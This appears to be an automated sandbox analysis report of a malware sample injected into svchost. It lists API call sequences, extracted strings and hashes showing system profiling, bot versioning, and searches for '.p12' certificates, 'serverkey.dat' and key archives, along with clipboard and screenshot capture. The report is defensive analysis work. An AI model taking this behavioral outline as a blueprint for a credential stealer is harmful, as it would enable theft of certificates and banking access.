                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 2738427392-2715564829
                                                                                                                                                                                                              • Opcode ID: eaa4d8c934d7ff704af079c11953c2618e2bf4a1931c3a0809f0e1d562bb8639
                                                                                                                                                                                                              • Instruction ID: fff80d1c054b1f761ff6bef5664b7b5c0dc3e61294ef79a5d4056f4386b367b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaa4d8c934d7ff704af079c11953c2618e2bf4a1931c3a0809f0e1d562bb8639
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BA20E70A81318BEFB249B94CC4AFEE7B78EF45B45F604548F201BA1C0D7F46A458B69
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 02C9D35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C9D36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 02C9D392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 02C9D3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 02C9D3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9D3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9D3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 02C9D418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9D428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C9D437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C9D44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C9D459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 02C9D46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C9D47F
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9D4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9D4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 02C9D4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 02C9D533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C9D55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 02C9D569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C9D585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C9D5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C9D5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9D5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C9D5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 02C9D5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C9D5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C9D613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C9D620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C9D630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 02C9D64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 02C9D655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 02C9D661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C9D67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9D6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9D6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C9D6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9D6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 02C9D707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 02C9D714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9D723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D73B
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9D2BC
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: GetCurrentThreadId.KERNEL32 ref: 02C9D2C4
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C9D2D0
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02C9D2E1
                                                                                                                                                                                                                • Part of subcall function 02C9D2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C9D2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C9D748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 02C9D7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 02C9D7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9D7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 02C9D7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 02C9D80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 02C9D818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C9D827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 02C9D82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 02C9D843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$static
                                                                                                                                                                                                              • API String ID: 2592195760-1233416523
                                                                                                                                                                                                              • Opcode ID: 141d5bce45e06576435550662a876ef1544af681d6828bc08d25e788ac8baa24
                                                                                                                                                                                                              • Instruction ID: 8c93f029a44e60b995870a3ecc6df7240099b16c394cb7263cc0d801686daeb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 141d5bce45e06576435550662a876ef1544af681d6828bc08d25e788ac8baa24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1AD71986301ABD7209F68EC88F6A37A8FB88762F504F08F556E72C0D774A551CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C93ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C93B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 02C93B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C93B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 02C93B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C93B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C93C27
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02C93CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 02C93CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C93D20
                                                                                                                                                                                                                • Part of subcall function 02CB5460: VirtualQuery.KERNEL32(02CB5460,?,0000001C,?,?,?,02C93BC8), ref: 02CB5488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • main, xrefs: 02C93BEE
                                                                                                                                                                                                              • csm, xrefs: 02C93A45
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C93C3E
                                                                                                                                                                                                              • CallStack:, xrefs: 02C93D58
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 02C93EB2
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 02C93ED4
                                                                                                                                                                                                              • scr.bmp, xrefs: 02C93FF8
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 02C93B68
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 02C93C8D
                                                                                                                                                                                                              • DEBUG, xrefs: 02C9404D
                                                                                                                                                                                                              • sysinfo.log, xrefs: 02C93F78
                                                                                                                                                                                                              • ThreadStart = , xrefs: 02C93CF8
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 02C93E8B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 2913300210-1369666974
                                                                                                                                                                                                              • Opcode ID: f851e6f1426ca44927172484e4f3673d5ef89c4fc207d187d1b0551eb7956579
                                                                                                                                                                                                              • Instruction ID: 0c75ef8dea790192546afbbf96bae68aaff976e539c4cb7524f9b0ed62be832e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f851e6f1426ca44927172484e4f3673d5ef89c4fc207d187d1b0551eb7956579
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A12F671A406459FDF15CF68C898BAABBF6FF88344F548598E84ADB340D731AA45CF80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2BCE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CB2C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB2C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CB2C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2C81
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02CB2C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02CB2CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02CB2D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505,00000000,00000000), ref: 02CB2D77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              • API String ID: 1576442920-959091512
                                                                                                                                                                                                              • Opcode ID: 15fd4ea778da98cb8c6c7161a47777729a931d629eee771bbc7ca8c63e6b0ebb
                                                                                                                                                                                                              • Instruction ID: a859f42628d73007963dbc2169184b71b97ac0403e26981dbfce40cc47a9c51d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15fd4ea778da98cb8c6c7161a47777729a931d629eee771bbc7ca8c63e6b0ebb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D157309452998FDB22CB34D858BEA7BE5EF85301F1486D4EC89D7241DB71DA88CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAD13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAD161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CAD176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 02CAD18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02CAD1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAD1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02CAD24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 02CAD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$A23C41FB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 989413159-1536425903
                                                                                                                                                                                                              • Opcode ID: 2fbbe6799759e7ce6fcda4a63285627ac8a7951e56cd5c85c18fd2359053305c
                                                                                                                                                                                                              • Instruction ID: 294645e46b5c82d2d53d034a2af64dd35c0899791728ddf2364eae0e85431934
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fbbe6799759e7ce6fcda4a63285627ac8a7951e56cd5c85c18fd2359053305c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C191715093468FCB15CB349468BABBBE5AFC9349F448A5DF9CAC7240EB31D608CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF570), ref: 02C911AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 02C911C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C911DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C911FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02C9123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C91245
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB4B0,00000000,00000000,00000000), ref: 02C91285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C912A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C912D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02C912F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C912F9
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C91325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAEB30,00000000,00000000,00000000), ref: 02C91339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB01A0,00000000,00000000,00000000), ref: 02C91376
                                                                                                                                                                                                                • Part of subcall function 02CAB410: PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB437
                                                                                                                                                                                                                • Part of subcall function 02CAB410: PathFileExistsA.SHLWAPI(?), ref: 02CAB4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9139F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02CA3D26,00000000,00000000,74DF2F00), ref: 02C976BB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C976C2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C976DA
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,02CA3D17,00000104), ref: 02C976E9
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02C97711
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02CA3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 02CA329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 02CA32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02CA32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02CA32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA3301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02CA332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02CA3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02CA33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02CA190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02CA1915
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA1990
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA1999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,74DEF550,74DF1620,80000002), ref: 02CA19E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA19E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA19F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA19F6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1A06
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA1A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA1A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA1A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA1A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,74DF2F00), ref: 02CB9991
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB99AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02CB99BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02CB99C9
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CB9A08
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CB9A16
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 02CB9B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 02CB9B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              • Opcode ID: 5b91a3062f8ed53cd817fb75f68ad940e0bf4aab374b72ca655e84b854bb4eca
                                                                                                                                                                                                              • Instruction ID: adeee4cfede36b16d6c9894b0a5f883cf3d48c50aef339186a8cb2d4e52d535d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b91a3062f8ed53cd817fb75f68ad940e0bf4aab374b72ca655e84b854bb4eca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B05181B19443419BD322DF14C884FABBBE9EFC9704F144A09FA8597241D7749A08CFA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              • Opcode ID: 6e36c8e1708557b23f4b046d440ca67d37a40eaf0e0ef6e12d523feeec76c736
                                                                                                                                                                                                              • Instruction ID: 237dc5d7a6bd31b633623e7c8ee67bcbc33346c266e103caf1534a987ce07bc7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e36c8e1708557b23f4b046d440ca67d37a40eaf0e0ef6e12d523feeec76c736
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F1C1B1A00209ABDF20CF58D888BAEB7B5FF88714F144569ED45A7340D771EE51CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(02CEDDB4,?,?,?), ref: 02CA3428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(02CEDDB4,?,?,?), ref: 02CA3438
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA3465
